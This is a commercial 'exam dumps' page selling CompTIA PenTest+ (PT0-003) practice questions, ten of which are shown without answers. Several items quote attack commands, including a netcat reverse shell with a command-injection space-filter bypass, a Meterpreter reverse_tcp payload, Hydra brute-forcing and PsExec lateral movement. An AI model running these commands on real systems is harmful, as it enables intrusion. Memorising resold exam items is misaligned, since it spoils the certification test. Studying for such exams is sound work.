Special Summer Sale 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: Board70

PT0-003 Exam Dumps - CompTIA PenTest+ Questions and Answers

Question # 54

During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine. Which of the following tools should the penetration tester use to continue the attack?

Options:

A.

Responder

B.

Hydra

C.

BloodHound

D.

CrackMapExec

Buy Now
Question # 55

A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:

nc -e /bin/sh 10.10.10.16 4444

Which of the following would most likely bypass the filtered space character?

Options:

A.

${IFS}

B.

%0a

C.

+ *

D.

%20

Buy Now
Question # 56

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

Options:

Buy Now
Question # 57

A penetration tester enumerates a legacy Windows host on the same subnet. The tester needs to select exploit methods that will have the least impact on the host's operating stability. Which of the following commands should the tester try first?

Options:

A.

responder -I eth0 john responder_output.txt

B.

hydra -L administrator -P /path/to/pwlist.txt -t 100 rdp://

C.

msf > use msf > set msf > set PAYLOAD windows/meterpreter/reverse_tcp msf > run

D.

python3 ./buffer_overflow_with_shellcode.py 445

Buy Now
Question # 58

Which of the following is the most efficient way to exfiltrate a file containing data that could be sensitive?

Options:

A.

Use steganography and send the file over FTP.

B.

Compress the file and send it using TFTP.

C.

Split the file in tiny pieces and send it over dnscat.

D.

Encrypt and send the file over HTTPS.

Buy Now
Question # 59

Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?

Options:

A.

Preserving artifacts

B.

Reverting configuration changes

C.

Keeping chain of custody

D.

Exporting credential data

Buy Now
Question # 60

A penetration tester is performing an assessment focused on attacking the authentication identity provider hosted within a cloud provider. During the reconnaissance phase, the tester finds that the system is using OpenID Connect with OAuth and has dynamic registration enabled. Which of the following attacks should the tester try first?

Options:

A.

A password-spraying attack against the authentication system

B.

A brute-force attack against the authentication system

C.

A replay attack against the authentication flow in the system

D.

A mask attack against the authentication system

Buy Now
Question # 61

While performing a penetration test, a tester executes the following command:

PS c:\tools> c:\hacks\PsExec.exe \\server01.cor.ptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options:

A.

Test connectivity using PsExec on the server01 using cmd.exe

B.

Perform a lateral movement attack using PsExec

C.

Send the PsExec binary file to the server01 using cmd.exe

D.

Enable cmd.exe on the server01 through PsExec

Buy Now
Question # 62

A penetration tester discovers evidence of an advanced persistent threat on the network that is being tested. Which of the following should the tester do next?

Options:

A.

Report the finding.

B.

Analyze the finding.

C.

Remove the threat.

D.

Document the finding and continue testing.

Buy Now
Question # 63

A penetration tester performs an assessment on the target company's Kubernetes cluster using kube-hunter. Which of the following types of vulnerabilities could be detected with the tool?

Options:

A.

Network configuration errors in Kubernetes services

B.

Weaknesses and misconfigurations in the Kubernetes cluster

C.

Application deployment issues in Kubernetes

D.

Security vulnerabilities specific to Docker containers

Buy Now
Exam Code: PT0-003
Exam Name: CompTIA PenTest+ Exam
Last Update: Mar 31, 2025
Questions: 233
PT0-003 pdf

PT0-003 PDF

$25.5  $84.99
PT0-003 Engine

PT0-003 Testing Engine

$28.5  $94.99
PT0-003 PDF + Engine

PT0-003 PDF + Testing Engine

$40.5  $134.99